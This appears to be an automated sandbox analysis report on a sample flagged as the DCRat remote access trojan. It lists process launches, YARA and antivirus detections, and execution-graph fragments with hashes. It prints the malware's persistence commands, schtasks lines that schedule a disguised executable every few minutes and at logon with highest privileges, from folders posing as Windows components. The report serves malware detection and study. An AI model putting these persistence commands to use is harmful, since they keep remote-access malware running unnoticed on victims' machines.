                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:13
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 10 /tr "'C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe'" /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:14
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:15
                                                                                                                              Start time:11:17:00
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 8 /tr "'C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f
                                                                                                                              Imagebase:0x7ff76f990000
                                                                                                                              File size:235'008 bytes
                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:16
                                                                                                                              Start time:11:17:01
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Imagebase:0x10000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.2938691750.00000000029B6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.2938691750.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 63%, ReversingLabs
                                                                                                                              Has exited:false

                                                                                                                              Target ID:17
                                                                                                                              Start time:11:17:01
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7aQ0YIT0mX.bat"
                                                                                                                              Imagebase:0x7ff7d8370000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:18
                                                                                                                              Start time:11:17:01
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:19
                                                                                                                              Start time:11:17:02
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Imagebase:0xa30000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:20
                                                                                                                              Start time:11:17:02
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Imagebase:0x9b0000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 63%, ReversingLabs
                                                                                                                              Has exited:true

                                                                                                                              Target ID:21
                                                                                                                              Start time:11:17:02
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\chcp.com
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:chcp 65001
                                                                                                                              Imagebase:0x7ff71a540000
                                                                                                                              File size:14'848 bytes
                                                                                                                              MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:22
                                                                                                                              Start time:11:17:02
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Imagebase:0xc30000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:23
                                                                                                                              Start time:11:17:02
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\System32\w32tm.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                              Imagebase:0x7ff6c7dd0000
                                                                                                                              File size:108'032 bytes
                                                                                                                              MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:24
                                                                                                                              Start time:11:17:07
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                                              Imagebase:0x790000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 63%, ReversingLabs
                                                                                                                              Has exited:true

                                                                                                                              Target ID:25
                                                                                                                              Start time:11:17:09
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\GameBarPresenceWriter\services.exe"
                                                                                                                              Imagebase:0x860000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:28
                                                                                                                              Start time:11:17:17
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                                              Imagebase:0xd50000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:31
                                                                                                                              Start time:11:17:25
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\GameBarPresenceWriter\services.exe"
                                                                                                                              Imagebase:0xcc0000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:32
                                                                                                                              Start time:11:17:33
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                                              Imagebase:0x9b0000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:33
                                                                                                                              Start time:11:17:41
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\GameBarPresenceWriter\services.exe"
                                                                                                                              Imagebase:0x9d0000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:34
                                                                                                                              Start time:11:17:49
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                                              Imagebase:0x520000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:35
                                                                                                                              Start time:11:17:58
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\GameBarPresenceWriter\services.exe"
                                                                                                                              Imagebase:0xd30000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:36
                                                                                                                              Start time:11:18:06
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                                              Imagebase:0x940000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 63%, ReversingLabs
                                                                                                                              Has exited:true

                                                                                                                              Target ID:37
                                                                                                                              Start time:11:18:15
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                                              Imagebase:0x60000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 63%, ReversingLabs
                                                                                                                              Has exited:true

                                                                                                                              Target ID:39
                                                                                                                              Start time:11:18:23
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                                              Imagebase:0x340000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:40
                                                                                                                              Start time:11:18:31
                                                                                                                              Start date:26/12/2024
                                                                                                                              Path:C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe"
                                                                                                                              Imagebase:0x2f0000
                                                                                                                              File size:3'163'910 bytes
                                                                                                                              MD5 hash:0A5D9CD0A4B6ABDBB272262811774A8D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:5.6%
                                                                                                                                Dynamic/Decrypted Code Coverage:75%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:12
                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                execution_graph 15903 7ffd9b91af5d 15904 7ffd9b91af6b SuspendThread 15903->15904 15906 7ffd9b91b044 15904->15906 15907 7ffd9b91c744 15908 7ffd9b91c748 ResumeThread 15907->15908 15910 7ffd9b91c854 15908->15910 15911 7ffd9b91e525 15912 7ffd9b91e572 GetFileAttributesW 15911->15912 15914 7ffd9b91e605 15912->15914 15915 7ffd9b91c8a9 15916 7ffd9b91c8b7 CloseHandle 15915->15916 15918 7ffd9b91c994 15916->15918
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1751904295.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b760000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 75f97c1f608120b261a0465555d6dbd1f3153274291904ebedb9012a3a2c794b
                                                                                                                                • Instruction ID: 85c3ae913cd76f6b5f5cfb6b6c00eb89c7907083459dd028656edf19dd2a3329
                                                                                                                                • Opcode Fuzzy Hash: 75f97c1f608120b261a0465555d6dbd1f3153274291904ebedb9012a3a2c794b
                                                                                                                                • Instruction Fuzzy Hash: 95A1A071A14A8D8FE788DF58D8697EE7BE1FF59300F5002BAD009D76E6DB7828018741

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754207568.00007FFD9B910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B910000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b910000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ResumeThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 947044025-0
                                                                                                                                • Opcode ID: 284831c4d3375332e040a4b7dcc5b2a4963ed3224cc0314f9a49f422debf72c7
                                                                                                                                • Instruction ID: 40f898509782262ae36b7e403b7e21097223711734ba3094b6daed6653710d1f
                                                                                                                                • Opcode Fuzzy Hash: 284831c4d3375332e040a4b7dcc5b2a4963ed3224cc0314f9a49f422debf72c7
                                                                                                                                • Instruction Fuzzy Hash: B0518E70E0874C8FDB55DFA8D895AEDBBF0EF5A310F0441ABD049DB292DA745846CB11

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 13 7ffd9b91af5d-7ffd9b91af69 14 7ffd9b91af74-7ffd9b91b042 SuspendThread 13->14 15 7ffd9b91af6b-7ffd9b91af73 13->15 18 7ffd9b91b044 14->18 19 7ffd9b91b04a-7ffd9b91b094 14->19 15->14 18->19
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754207568.00007FFD9B910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B910000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b910000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: SuspendThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3178671153-0
                                                                                                                                • Opcode ID: 6f0e49f39ebca6bc2e2795240bb7d88083f6c526a9e0087450466e88cd89bec7
                                                                                                                                • Instruction ID: 87ca1d2ecf525dd3dd199aa6369281ad7fa0e48cfceb1fa50d1d9209c38e0f15
                                                                                                                                • Opcode Fuzzy Hash: 6f0e49f39ebca6bc2e2795240bb7d88083f6c526a9e0087450466e88cd89bec7
                                                                                                                                • Instruction Fuzzy Hash: F0415E70E0864C8FDB59DF98D895BEDBBF0FB5A310F10416AD059E7252DA74A845CB40

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 22 7ffd9b91e525-7ffd9b91e603 GetFileAttributesW 25 7ffd9b91e605 22->25 26 7ffd9b91e60b-7ffd9b91e649 22->26 25->26
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754207568.00007FFD9B910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B910000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b910000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                • Opcode ID: 022a97dcda1abda9479d9095b4a831e463f8b1e33fb17cb108bf809f831b5907
                                                                                                                                • Instruction ID: 86daee6d1753403e65e44204b83204c5e6133c26f7e097a5091bc7b2ee035b58
                                                                                                                                • Opcode Fuzzy Hash: 022a97dcda1abda9479d9095b4a831e463f8b1e33fb17cb108bf809f831b5907
                                                                                                                                • Instruction Fuzzy Hash: 9F410870A08A1C8FDB99DF98D895BEDBBF0FB59310F10416AD009E7252DA719885CF40

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                • Opcode ID: da32c76cc601ed70ac06b1127c3c88f102f9799dd8cf7c57f3fea4a7a02361f4
                                                                                                                                • Instruction ID: 46340d52debe4e978db8ddd10d6d800b2f11d5884dff7c6ccb0a8f36e8bb1fd6
                                                                                                                                • Opcode Fuzzy Hash: da32c76cc601ed70ac06b1127c3c88f102f9799dd8cf7c57f3fea4a7a02361f4
                                                                                                                                • Instruction Fuzzy Hash: 16513875E0A54E8FDB69DBD8C4655BDB7B5EF44300F5140BAD01FA72A2CB3A6A01CB40

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                • Opcode ID: 6b13f95b203724340ca73e0e58645aabe921899d07ff2dcec815d3f119f0382a
                                                                                                                                • Instruction ID: 177649012774bdba353e7e1c6574dbd7843e4b8124c584aceb0058553d631fc1
                                                                                                                                • Opcode Fuzzy Hash: 6b13f95b203724340ca73e0e58645aabe921899d07ff2dcec815d3f119f0382a
                                                                                                                                • Instruction Fuzzy Hash: E6519D71E1950E9FDB58DBD8D8A15FDB7B1FF48340F1141BAD05AE72A6CA392A01CB40

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 97 7ffd9b91c8a9-7ffd9b91c8b5 98 7ffd9b91c8c0-7ffd9b91c992 CloseHandle 97->98 99 7ffd9b91c8b7-7ffd9b91c8bf 97->99 102 7ffd9b91c994 98->102 103 7ffd9b91c99a-7ffd9b91c9ee 98->103 99->98 102->103
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754207568.00007FFD9B910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B910000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b910000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                • Opcode ID: 6b287dee8b731397fc83ee703d497088e7453115300cb4f67bc71a7286233853
                                                                                                                                • Instruction ID: 7829d2dfefcd67a33df5cbd432ab148fd8181f1378bf4cf0743dbe02affd6cae
                                                                                                                                • Opcode Fuzzy Hash: 6b287dee8b731397fc83ee703d497088e7453115300cb4f67bc71a7286233853
                                                                                                                                • Instruction Fuzzy Hash: AF415B70A0865C8FDB59DFA8D894BEDBBF0EF5A311F1041AAD049E7292DA749885CB01
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2718ae84c51cb8aec921d2483cb568e302613a2c763e75a336dee08912b9b15f
                                                                                                                                • Instruction ID: b9f9dccd1c57ab2afe56f3d19f507e171883f1c10d9344adae9909be0734fd4e
                                                                                                                                • Opcode Fuzzy Hash: 2718ae84c51cb8aec921d2483cb568e302613a2c763e75a336dee08912b9b15f
                                                                                                                                • Instruction Fuzzy Hash: 9D620D17E4F1A71FEB31B6A864B68F93FB49F1262470941F7E09D4D0E3DD0E26868681

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 93b66e635e7b16bd6db651c48f25ccac5e111e2c4b120420995779f13fbe4a0b
                                                                                                                                • Instruction ID: 609a723e256c5cd1ec5808efc9f7d862cf9c5472e0916f190eceddf251514cf3
                                                                                                                                • Opcode Fuzzy Hash: 93b66e635e7b16bd6db651c48f25ccac5e111e2c4b120420995779f13fbe4a0b
                                                                                                                                • Instruction Fuzzy Hash: 5932A330B19A1D8FDBA8DB48C8A5A7973E6FF58310F5141B9D00EC72A2DE25ED45CB80

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bd3396010672576a68b6eb6e9c34f6b537f37cfd2d88a222b1e8890e37bbf227
                                                                                                                                • Instruction ID: a655de3dd909cd9684b91b2dee056a1e10152b638140ead7fedb3c83d8c857a1
                                                                                                                                • Opcode Fuzzy Hash: bd3396010672576a68b6eb6e9c34f6b537f37cfd2d88a222b1e8890e37bbf227
                                                                                                                                • Instruction Fuzzy Hash: 1002E330B0EA4F8FE77ADB98D4A19B977A5FF44300B11057ED04EC76A2DA2AB9418741

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8aee2c1c6c22b363280dd20af51559b36fa472cc98abb72d33913b88ef7aaa6e
                                                                                                                                • Instruction ID: 6b9fae70381b1009252fa3dff101d01be9ededb404552b618b56375d4a856c8c
                                                                                                                                • Opcode Fuzzy Hash: 8aee2c1c6c22b363280dd20af51559b36fa472cc98abb72d33913b88ef7aaa6e
                                                                                                                                • Instruction Fuzzy Hash: 80B1BE31B0EA4E4FE3789A6888754B577D8EF95310F05017ED08FC31A2DE2BB9028741

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1761705872.00007FFD9BE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE30000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd9be30000_Z4D3XAZ2jB.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
